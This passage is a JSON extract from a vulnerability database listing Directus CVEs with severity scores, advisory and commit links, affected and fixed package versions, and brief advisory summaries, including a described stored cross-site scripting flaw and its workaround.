,"scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T16:23:35Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408"},{"reference_url":"https://github.com/advisories/GHSA-8m32-p958-jg99","reference_id":"GHSA-8m32-p958-jg99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8m32-p958-jg99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35408","GHSA-8m32-p958-jg99"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mp82-hx9n-dufy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/265251?format=json","vulnerability_id":"VCID-msb5-197k-a3er","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990","reference_id":"","reference_type":"","scores":[{"value":"0.00237","scoring_system":"epss","scoring_elements":"0.46944","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff"},{"reference_url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990","reference_id":"CVE-2024-46990","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990"},{"reference_url":"https://github.com/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68g8-c275-xf2m"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82736?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/82737?format=json","purl":"pkg:npm/directus@11.0.0-rc.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1"},{"url":"http://public2.vulnerablecode.io/api/packages/82738?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-bjzg-mzjf-cfau"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-w1ph-v2n1-nbby"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-46990","GHSA-68g8-c275-xf2m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-msb5-197k-a3er"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20779?format=json","vulnerability_id":"VCID-na3v-me78-aqcg","summary":"Directus Vulnerable to Information Leakage in Existing Collections\nAn observable difference in error messaging was found in the Directus REST API. The `/items/{collection}` API returns different error messages for these two cases:\n1. A user tries to access an existing collection which they are not authorized to access.\n2. A user tries to access a non-existing collection.\n\nThe two differing error messages leak the existence of collections to users which are not authorized to access these collections.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14466","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749","reference_id":"CVE-2025-64749","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749"},{"reference_url":"https://github.com/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cph6-524f-3hgr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64749","GHSA-cph6-524f-3hgr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-na3v-me78-aqcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20770?format=json","vulnerability_id":"VCID-nvha-b5tb-dqdt","summary":"Directus's conceal fields are searchable if read permissions enabled\nA vulnerability allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13839","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748","reference_id":"CVE-2025-64748","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748"},{"reference_url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64748","GHSA-8jpw-gpr4-8cmh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nvha-b5tb-dqdt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330169?format=json","vulnerability_id":"VCID-p1m5-v3rs-wbh7","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02855","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:04:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409"},{"reference_url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h","reference_id":"GHSA-wv3h-5fx7-966h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188565?format=json","purl":"pkg:npm/directus@11.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.0"}],"aliases":["CVE-2026-35409","GHSA-wv3h-5fx7-966h"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p1m5-v3rs-wbh7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15449?format=json","vulnerability_id":"VCID-p7d9-91j7-dbab","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nDirectus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to a file uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ \"media_live_embeds\": false }` to the _Options Overrides_ option of the Rich Text HTML interface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814","reference_id":"","reference_type":"","scores":[{"value":"0.0043","scoring_system":"epss","scoring_elements":"0.62814","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/12020","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/pull/12020"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814","reference_id":"CVE-2022-24814","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814"},{"reference_url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60235?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-9gba-zszk-p3h6"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-t